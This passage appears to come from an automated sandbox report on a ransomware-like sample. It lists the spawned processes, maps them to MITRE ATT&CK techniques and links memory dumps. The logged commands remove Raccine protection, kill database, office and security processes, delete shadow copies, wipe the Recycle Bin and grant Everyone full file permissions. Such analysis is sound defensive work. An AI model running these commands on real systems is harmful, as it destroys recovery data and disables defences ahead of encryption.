  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:4132
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:2340
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4756
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4764
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1184
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4992
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4928
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4848
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:4484
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1232
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:4336
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4740
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:1184
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:1704
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:4508
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1232
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1496
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:1324
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:2732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:4380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:5092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:5108
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:1164
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:4588
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:4540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:1496
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:4204
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:4372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:4132
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:4240
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:2472
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4484
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:4172
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:4800
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:4308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:4584
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:3976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:4744
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:4144
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:4316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:2260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:4684
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:4644
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4564
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:5032
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:4332
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:4884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:4396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:3680
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:4212
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:2732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  PID:1976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  PID:4832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  PID:4224
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4180
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:4860
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:4844
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:5100
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  PID:4244
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  PID:3892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:4452
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8137.bat
  2⤵
  PID:4732
- - C:\Windows\system32\mountvol.exe
    mountvol
    3⤵
    PID:1840
- - C:\Windows\system32\find.exe
    find "}\"
    3⤵
    PID:2300
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{d05cfc4a-0000-0000-0000-500600000000}\
    3⤵
    PID:4056
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4044
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{d05cfc4a-0000-0000-0000-100000000000}\
    3⤵
    PID:888
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:5000
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{7ee95057-98a6-11eb-b2cf-806e6f6e6963}\
    3⤵
    PID:3456
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1540
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:5056
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\UnpublishReset.mov /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4408
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4328
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2104
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4292
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3680
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5040
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4712
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4696
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:748
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4896
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121055-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121224-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4320
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121504-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:916
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04082021-121711-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5096
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04082021-121055.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1864
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04082021-121055.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04082021-121055-00000003-ffffffff.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4192
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.80 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.83 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-41BB838CD7DD9EB515C54B7D92875CBD41632034.bin.A0 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4668
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpenginedb.db /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:988
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1240
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4160
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4868
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4548
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:136
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3844
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3908
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4964
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1428
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4284
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/620-116-0x000000001AD80000-0x000000001AD82000-memory.dmp

Filesize
8KB

Download
memory/620-114-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/1736-201-0x000001C8696E3000-0x000001C8696E5000-memory.dmp

Filesize
8KB

Download
memory/1736-224-0x000001C8696E6000-0x000001C8696E8000-memory.dmp

Filesize
8KB

Download
memory/1736-247-0x000001C8696E8000-0x000001C8696E9000-memory.dmp

Filesize
4KB

Download
memory/1736-199-0x000001C8696E0000-0x000001C8696E2000-memory.dmp

Filesize
8KB

Download
memory/2028-221-0x0000016C3AD76000-0x0000016C3AD78000-memory.dmp

Filesize
8KB

Download
memory/2028-230-0x0000016C3AD78000-0x0000016C3AD79000-memory.dmp

Filesize
4KB

Download
memory/2028-167-0x0000016C3AD73000-0x0000016C3AD75000-memory.dmp

Filesize
8KB

Download
memory/2028-164-0x0000016C3AD70000-0x0000016C3AD72000-memory.dmp

Filesize
8KB

Download
memory/2104-258-0x00000288A5468000-0x00000288A5469000-memory.dmp

Filesize
4KB

Download
memory/2104-207-0x00000288A5463000-0x00000288A5465000-memory.dmp

Filesize
8KB

Download
memory/2104-227-0x00000288A5466000-0x00000288A5468000-memory.dmp

Filesize
8KB

Download
memory/2104-206-0x00000288A5460000-0x00000288A5462000-memory.dmp

Filesize
8KB

Download
memory/2248-209-0x000001B77F1A3000-0x000001B77F1A5000-memory.dmp

Filesize
8KB

Download
memory/2248-208-0x000001B77F1A0000-0x000001B77F1A2000-memory.dmp

Filesize
8KB

Download
memory/2248-231-0x000001B77F1A6000-0x000001B77F1A8000-memory.dmp

Filesize
8KB

Download
memory/2248-261-0x000001B77F1A8000-0x000001B77F1A9000-memory.dmp

Filesize
4KB

Download
